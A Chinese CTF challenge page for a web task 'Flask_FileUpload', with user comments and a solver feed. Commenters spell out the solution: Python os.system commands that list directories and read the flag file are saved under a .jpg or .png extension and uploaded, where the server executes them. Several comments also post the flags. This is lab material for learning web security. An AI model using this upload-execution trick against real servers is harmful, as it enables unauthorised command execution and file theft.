Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 10904
提  示:
描  述:
Flask_FileUpload
评论
zhaiwb 1年前

这种题怎么答,我是小白。有入口吗??

回复 2
wxhctf 5月前

@主旋律世界 怎么用命令找呢

回复 0

Cmy520CTF 1年前

@Sunyang import os os.system('ls ../') os.system('cat ../flag')

回复 0

Sunyang 1年前

@Cmy520CTF 代码是啥?

回复 0

主旋律世界 1年前

我也是小白,这个路径不可能一眼看出来,可以拿命令找一下,发现在环境变量里面才是用cat /flag

回复 0

Cmy520CTF 1年前

创建一个文本,将代码放进去,改成JPG或者PNG格式,上传文件即可获取flag

回复 2

Cmy520CTF 1年前

import os os.system('ls ../') os.system('cat ../flag')

回复 1

孤独的XK 1年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 1

孤独的XK 1年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 0

孤独的XK 1年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 0

2802867984 1年前

!-- File "/app/upload/1111.jpg", line 1 Python 3.9.7 (tags/v3.9.7:1016ef3, Aug 30 2021, 20:19:38) [MSC v.1929 64 bit (AMD64)] on win32 ^ SyntaxError: invalid syntax --&

回复 0

1019697179 1年前

import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令

回复 1

15091760453 1年前

flag{1c6b553c3a91791993b859e1625275ac}

回复 0

Cat00011cat 1年前

import os os.system('ls / -l') os.system('cat /flag')

回复 2

nf1y 1年前

为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de

回复 0
不知名学渣 1年前

@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?

回复 0

aWxvdmVjdGY 1年前

1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行

回复 0

白猫a 1年前

这个作者可以哇,题目解的真精彩!!!

回复 1

WriteUp

image
国家级划水运动员

3 金币

评分(19)

解题动态

Despa1r 攻破了该题 15小时前
群众里有坏人 攻破了该题 16小时前
xixixixi 攻破了该题 1天前
slagman 攻破了该题 1天前
coolsword2023 攻破了该题 1天前
262162095 攻破了该题 1天前
Spirita 攻破了该题 2天前
srsr233 攻破了该题 2天前
ZhouShaoyang 攻破了该题 2天前
admin123com 攻破了该题 3天前
1275178332 攻破了该题 3天前
keekek0411 攻破了该题 3天前
3220834022 攻破了该题 3天前
18225355670 攻破了该题 3天前
AshSkyGray 攻破了该题 3天前
guoskr 攻破了该题 3天前
18042157087 攻破了该题 3天前
skyorangezxc 攻破了该题 3天前
Vinsonx 攻破了该题 4天前
ha33 攻破了该题 4天前